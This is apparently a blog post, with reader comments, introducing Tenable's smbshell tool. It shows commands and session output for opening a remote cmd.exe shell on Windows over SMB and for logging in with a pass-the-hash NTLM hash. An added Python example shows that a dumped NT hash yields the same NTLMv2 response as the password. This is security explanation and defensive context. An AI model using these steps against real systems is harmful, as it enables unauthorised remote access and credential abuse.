Description
smbshell is a pre-compiled NASL script which can be used as a standalone tool to do the following tasks:
- Navigate through the remote SMB shares and download files or obtain their version number
- Read/Enumerate the remote SMB registry
- Query/Start/Stop/Pause remote services
- Obtain an interactive shell (cmd.exe) on the remote host
Installation
smbshell is a pre-compiled NASL script, so you need to install Nessus 3 first. To run smbshell, download it and run it through the 'nasl' command-line utility:
$ /opt/nessus/bin/nasl -t TargetIP smbshell.nbin
Under Windows, copy it to C:\Program Files\Tenable\Nessus\Plugins\Scripts\. Then you can do:
C:\> Program Files\Tenable\Nessus\nasl.exe -t TargetIP smbshell.nbin
Usage
cg@WPAD:~/evil/passthehashstuff$ /opt/nessus/bin/nasl -t 192.168.0.103 smbshell.nbin
--==[SMB Shell v0.3 (c) 2007 Tenable Network Security]==--
[*] username: smbshell
[*] password:
[*] domain (optional):
[*] Connecting to 192.168.0.103...
[*] Authenticating to 192.168.0.103...
smbshell> help
The following commands are supported :
help - the current screen
ftp - SMB ftp client
reg - registry browser
users - SMB users & groups browser
services - service manager
quit/exit - exit
smbshell>
Oh, and shell. shell is fun:
smbshell> shell
[*] Opening share ADMIN$...
[*] Connected to ADMIN$ (192.168.0.100:41095 -> 192.168.0.101:445)
[*] Installing remote command service...
[*] Remote command service installed.
[*] Connecting to remote command service...
[*] Connected to remote command service.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\system32>echo woot
echo woot
woot
C:\WINDOWS\system32>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Media State . . . . . . . . . . . : Media disconnected
Ethernet adapter Wireless Network Connection:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.0.101
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.0.1
C:\WINDOWS\system32>
C:\WINDOWS\system32>exit
[*] Removing remote command service...
[*] Remote command service removed.
Pass the Hash info
http://blog.tenablesecurity.com/2007/06/lmntlm-hash-sup.html
###########################################
--==[SMB Shell v0.3 (c) 2007 Tenable Network Security]==--
[*] username: administrator
[*] password: **Just hit enter here**
[*] hash: NTLM:78164FD1E988FE5B39E0474EEE475E51
[*] domain (optional):
[*] Connecting to 172.11.12.184...
[*] Authenticating to 172.11.12.184...
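Why hitting enter at the password prompt and supplying the hash works: NTLM authentication never needs the cleartext password, only the NT hash (MD4 over the UTF-16LE password), which is exactly the value smbshell accepts as NTLM:&lt;hex&gt;. The Python below is an added example, not Tenable's code or anything from smbshell; it implements MD4 in pure Python (so it does not depend on OpenSSL's legacy MD4 provider), derives the NT hash, and computes an NTLMv2 response per MS-NLMP once from the password and once from a dumped hash, showing the two are identical. The user name, domain, server/client challenges, timestamp, target-info block and the small NTLM:&lt;hex&gt; parsing helper are all constructed for the example and are not taken from the page.

```python
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF


def _rol(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """MD4 per RFC 1320 in pure Python: OpenSSL 3 builds of hashlib often
    lack the legacy MD4 provider, and an NT hash is exactly MD4."""
    msg = bytearray(data)
    msg.append(0x80)
    while len(msg) % 64 != 56:
        msg.append(0)
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)

    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rounds = (
        (f, 0x00000000, list(range(16)), (3, 7, 11, 19)),
        (g, 0x5A827999, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
        (h, 0x6ED9EBA1, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", bytes(msg[off:off + 64]))
        aa, bb, cc, dd = a, b, c, d
        for func, k, order, shifts in rounds:
            for i in range(16):
                a = _rol((a + func(b, c, d) + x[order[i]] + k) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate so the next step updates d, then c, then b
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); this is what NTLM:<hex> carries."""
    return md4(password.encode("utf-16-le"))


def parse_hash_arg(arg: str) -> bytes:
    """Parse the NTLM:<32 hex> form shown at smbshell's hash prompt.
    Assumption: only that form is handled here."""
    tag, _, hexdigest = arg.partition(":")
    if tag.upper() != "NTLM" or len(hexdigest) != 32:
        raise ValueError("expected NTLM:<32 hex chars>")
    return bytes.fromhex(hexdigest)


def ntlmv2_response(nt: bytes, user: str, domain: str, server_challenge: bytes,
                    client_challenge: bytes, timestamp: int, target_info: bytes) -> bytes:
    """NTLMv2 response per MS-NLMP 3.3.2: NTOWFv2 is keyed by the NT hash, so the
    cleartext password is never an input."""
    ntowf_v2 = hmac.new(nt, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()
    temp = (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp)
            + client_challenge + b"\x00" * 4 + target_info + b"\x00" * 4)
    nt_proof = hmac.new(ntowf_v2, server_challenge + temp, hashlib.md5).digest()
    return nt_proof + temp


# Constructed challenge material for the example (not captured from a real session).
USER, DOMAIN = "administrator", "WORKGROUP"
SERVER_CHALLENGE = bytes.fromhex("0123456789abcdef")
CLIENT_CHALLENGE = bytes.fromhex("aaaaaaaaaaaaaaaa")
TIMESTAMP = 0x01C900000000000  # arbitrary Windows FILETIME
_DOM = DOMAIN.encode("utf-16-le")
TARGET_INFO = (struct.pack("<HH", 2, len(_DOM)) + _DOM   # MsvAvNbDomainName
               + struct.pack("<HH", 0, 0))               # MsvAvEOL


def hash_only_matches_password(password: str = "password") -> bool:
    """What pass-the-hash relies on: an attacker holding only the dumped NT hash
    produces the same NTLMv2 response as the user who knows the password."""
    from_password = ntlmv2_response(nt_hash(password), USER, DOMAIN, SERVER_CHALLENGE,
                                    CLIENT_CHALLENGE, TIMESTAMP, TARGET_INFO)
    # Published NT hash of "password", as it would come out of a credential dump.
    dumped = parse_hash_arg("NTLM:8846F7EAEE8FB117AD06BDD830B7586C")
    from_hash = ntlmv2_response(dumped, USER, DOMAIN, SERVER_CHALLENGE,
                                CLIENT_CHALLENGE, TIMESTAMP, TARGET_INFO)
    return from_hash == from_password


if __name__ == "__main__":
    print("NT hash of 'password':", nt_hash("password").hex())
    print("hash-only response == password-derived response:", hash_only_matches_password())
```

The point to take from it: the NT hash is a password equivalent for NTLM, so fixes to SMB reflection or relay do not change anything here; the only control is keeping the hashes (SAM, LSASS, cached logons) away from the attacker.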
If you have no idea what nasl is:
http://blog.tenablesecurity.com/2007/06/using-the-nasl-.html
Thanks to MC for bringing this up to me.
Lastly, if I see this shit in some "cutting edge hacker techniques" webcast without a mention of this post, I'm gonna go off, because this has been out for over two years... I'll leave it at that.
3 comments:
A timely post; especially since MS just fixed this today (MS08-068).
It was first reported by CDC way back in 2001...it's about damn time. ;)
Actually, looking at the MS08-068 report, it fixes the SMB relay vulnerability.
With this tool you either have to have a password or a hash to log in; it doesn't reflect back any creds to do the logging in.
I don't think they'll be able to fix the pass the hash thing; you just have to keep the bad guys from getting those hashes.
Very nice.
A question: do these scripts work for you?
smb_accessible_shares.nasl, smb_blank_admin_password and smb_null_session.nasl scripts